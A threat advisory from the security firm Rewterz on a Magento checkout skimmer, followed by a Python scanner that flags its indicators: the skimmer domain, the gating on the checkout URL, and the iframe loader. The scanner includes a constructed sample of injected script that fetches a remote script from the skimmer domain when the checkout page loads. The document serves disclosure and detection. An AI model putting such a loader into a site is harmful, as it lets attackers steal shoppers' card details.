Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Severity
Medium
Analysis Summary
Suspicious activity was observed on a Magento site. The following checkout pages look slightly different, with the one on the right being the suspicious site. It was found that a skimmer had injected its own credit card fields into the altered checkout page.
The text below the credit card field specifically caught the researchers' attention, as it says:
“Then you will be redirected to PayuCheckout website when you place an order.”
Even though online merchants do use such forms (including iframes) as part of their checkout pages, what is suspicious here is that users will be redirected to another checkout page (this time the legitimate one) to enter their credit card details again.
Having to enter card details twice should be a red flag, because it is a common pattern on phishing sites.
Upon further research, injected code was found to be present in all the PHP pages of that site, but it only triggered if the current URL in the address bar was the shopping cart checkout page (onestepcheckout).
If the right conditions are met, an external piece of JavaScript is loaded from thatispersonal[.]com. However, directly browsing to this URL without the correct Referer (one of the hacked Magento sites) returns a decoy script instead. The complete script is largely obfuscated and creates the iframe box seen above for harvesting credit card details.
It also loads another long obfuscated script ([hackedsite]_iframe.js) to process, validate, and then exfiltrate the user data.
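A file-system triage scanner for the indicators described above (checkout-page gating, the external domain, the `_iframe.js` loader), added here as an example and not Rewterz's code or tooling; the regex forms and the constructed sample files are this example's own assumptions about how such an injection might appear in a Magento document root:

```python
import os
import re
# Indicators from the advisory; the regex forms are this example's assumptions.
INDICATORS = {
    "skimmer_domain": re.compile(r"thatispersonal\.com", re.I),
    "checkout_gate": re.compile(r"onestepcheckout", re.I),
    "iframe_loader": re.compile(r"_iframe\.js\b", re.I),
    "remote_script": re.compile(r"<script[^>]+src\s*=\s*[\"']https?://", re.I),
}

def scan_text(text):
    """Return {indicator: [line numbers]} for every indicator found in the text."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def classify(hits):
    """Triage verdict: the skimmer is a remote script gated on the checkout URL."""
    if "skimmer_domain" in hits or "iframe_loader" in hits:
        return "likely_skimmer"
    if "checkout_gate" in hits and "remote_script" in hits:
        return "suspicious"
    return "clean"

def scan_tree(root, exts=(".php", ".phtml", ".js")):
    """Walk a Magento docroot; return {path: (verdict, hits)} for non-clean files."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                verdict = classify(hits)
                if verdict != "clean":
                    findings[path] = (verdict, hits)
    return findings

# Constructed sample of the gating the advisory describes (loader stub, not skimmer code).
SAMPLE_INJECTED = """<script>
if (location.href.indexOf('onestepcheckout') !== -1) {
  var s = document.createElement('script');
  s.src = 'https://thatispersonal.com/loader.js';
  document.head.appendChild(s);
}
</script>"""
SAMPLE_CLEAN = "<?php echo $this->getChildHtml('checkout.onestepcheckout'); ?>"  # constructed, benign
```

Because the loader in the real incident is obfuscated, the domain string may not appear in clear text, so treat this as a first pass and also diff the document root against a known-good copy or the package manifest.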
Impact
Indicators of Compromise
URLs
Remediation
Block the threat indicators at your respective controls